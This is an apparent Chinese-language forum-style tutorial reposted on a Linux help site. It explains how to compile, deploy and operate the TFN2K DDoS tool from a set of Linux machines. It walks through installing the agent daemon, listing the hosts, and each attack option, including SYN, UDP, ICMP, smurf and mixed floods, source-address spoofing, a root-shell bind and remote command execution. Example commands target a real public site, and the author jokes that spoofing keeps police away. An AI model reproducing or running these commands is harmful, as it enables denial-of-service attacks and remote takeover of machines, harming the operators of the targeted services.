歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
Linux教程網 >> Linux綜合 >> Linux資訊 >> 更多Linux >> 使用LINUX系統DDOS攻擊WINDOWS服務器

使用LINUX系統DDOS攻擊WINDOWS服務器

日期:2017/2/27 14:11:19   编辑:更多Linux
安全說的多了,說說攻擊吧,作為本論壇的新人,請大家指正
首先說我們用來攻擊的客戶機和服務器的配置方法,使用當下最有名的REDHAT Linux進
行測試,本次攻擊測試我使用的是FEDORA CORE3 ,軟件用的是最有名的DDOS攻擊工具
TFN2K LINUX版,被攻擊的WINDOWS服務器系統使用的是WINDOWS2000
SERVER 服務開有APACHE2 FTP VNC關系不大,主要攻擊APACHE
廢話不說了,開始設置服務器.
0.解壓 tar -zxvf tfn2k.tgz
1.安裝TFN2K
TFN2K為開放原代碼的軟件,所以需要我們進行編譯,這個不用說了,編譯應該都會的吧,但有
幾個地方是必需注意的,因為使用不同版本和廠商的LINUX需要不同的設置.
先修改src/ip.h
注釋掉以下部分,否則編譯出錯。
   
/*strUCt in_addr
   {
   unsigned long int s_addr;
};*/
然後make進行編譯
編譯時會提示你輸入服務器端進行密碼設置8-32位,(攻擊的時候需要輸入密碼)編譯後會出
現兩個新的執行文件td 和 tfn,其中td是守護進程,也是客戶機的使用進程,而tfn是服務器
控制進程,如果想攻擊別人就必需先起動td這個進程,然後再運行服務器進程,否則攻擊無效,
更改密碼可以執行mkpass進行更改,最後在所有的客戶機中安裝並運行td(需要ROOT權
限),並且在服務器上建立一個文本文件,文件中記錄所有的客戶機IP地址(用VI編輯一個就
可行了),格式為:
192.168.0.1
192.168.0.2
192.168.0.3
IP
IP
.....
然後在主服務器上運行./tfn
2.攻擊
./tfn直接回車大家可以看到一些參數,英文好的朋友估計不用我來多講了:)
格式./tfn <參數>
無用的參數我們不提,我們來說攻擊用的
-f 這個參數後面跟剛才所寫的文本文件名,就是真正實現DDOS攻擊,而不是DOS
-h DOS攻擊,也就是單機,一對一的攻擊 後面跟一個主機或IP地址
-p 後面指定一個端口,不用說了
-c 最關鍵的參數,一共有11個選相
0 - 停止攻擊,發善心用的
1 - 反欺騙等級設定 ,因為TFN這個工具在攻擊的時候所發出的數據包是帶有源地址的,但是
源地址是隨機的,也就是說地址不是你自給的,所以不用擔心警察抓,哈哈
2 - 改編數據包的包尺寸:缺省的ICMP/8,smurf,udp攻擊缺省使用最小包。你可以通過
改變每個包的有效載荷的字節增加它的大小。
3 - 綁定root shell:啟動一個會話服務,然後你連接一個指定端口就可以得到一個root
shell。
4 - UDP洪水攻擊:這個攻擊是利用這樣一個事實:每個udp包被送往一個關閉的端口,
這樣就會有一個ICMP不可到達的信息返回,增加了攻擊的能力。
5 - SYN洪水攻擊:這個攻擊有規律的送虛假的連接請求。結果會是目標端口拒絕服務,
添瞞TCP連接表,通過對不存在主機的TCP/RST響應增加攻擊潛力,是標准的拒絕服務攻
擊.
6 - ICMP響應(ping)攻擊:這個攻擊發送虛假地址的ping請求,目標主機會回送相同
大小的響應包。
7 - SMURF攻擊:用目標主機的地址發送ping請求以廣播擴大,這樣目標主機將得到回
復一個多倍的回復。
8 - MIX攻擊:按照1:1:1的關系交替的發送udp,syn,icmp包,這樣就可以對付路由
器,其它包轉發設備,NIDS,sniffers等,輪番轟炸:)
9 - TARGA3攻擊
10 - 遠程命令執行,這個參數是TFN的附加功能,其實TFN的攻擊不僅僅是DOS,還可以
遠程的進行明令控制,如:
./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有的HOST上root家目錄建立
edison,-i後面跟"命令"
參數基本說完,下面攻擊
./tfn -f hostext -c 4 -i www.163.com
使用hostext文件中記錄的主機對163服務器進行UDP攻擊(所有的主機中必需已經起動
td進程)
./tfn -f hostext -c 5 -i www.163.com -p 80
使用hostext文件中記錄的主機對163服務器進行TCP拒絕服務攻擊(80攻擊WEB,其他
不用說了)
./tfn -f hostext -c 6 -i www.163.com
使用hostext文件中記錄的主機對163服務器進行ICMP攻擊(PING攻擊,緩沖區溢出馬上



死機)
./tfn -f hostext -c 8 -i www.163.com
使用hostext文件中記錄的主機對163服務器進行ICMP&TCP&UDP輪番攻擊(如果對方
是sniffer一定哭死)
./tfn -f hostext -c 0
讓所由主機停止攻擊
基本說完,最後說說我的測試結果
一對一攻擊,攻擊方式TCP 連接方式本地 本地CPU13% 被攻擊的服務器CPU使用率70%
以上,並時時波動
二對一攻擊,攻擊方式TCP 連接方式本地 本地單機CPU13% 被攻擊的服務器CPU使用率
100%
五對一攻擊,攻擊方式TCP 連接方式本地 本地單機CPU13% 被攻擊的服務器死機
本人家裡只有6台機器,但如果再多點,幾十台機器,一般的個人服務器肯定要死掉了
一對一攻擊,攻擊方式ICMP 連接方式本地 本地CPU18% 被攻擊的服務器CPU使用率
96%以上,並時時波動
二對一攻擊,攻擊方式ICMP 連接方式本地 本地單機CPU18% 被攻擊的服務器以經無法上
網,幾乎無法使用,半小時內死機
看來威力不小,請個位手下留情啊:P



Copyright © Linux教程網 All Rights Reserved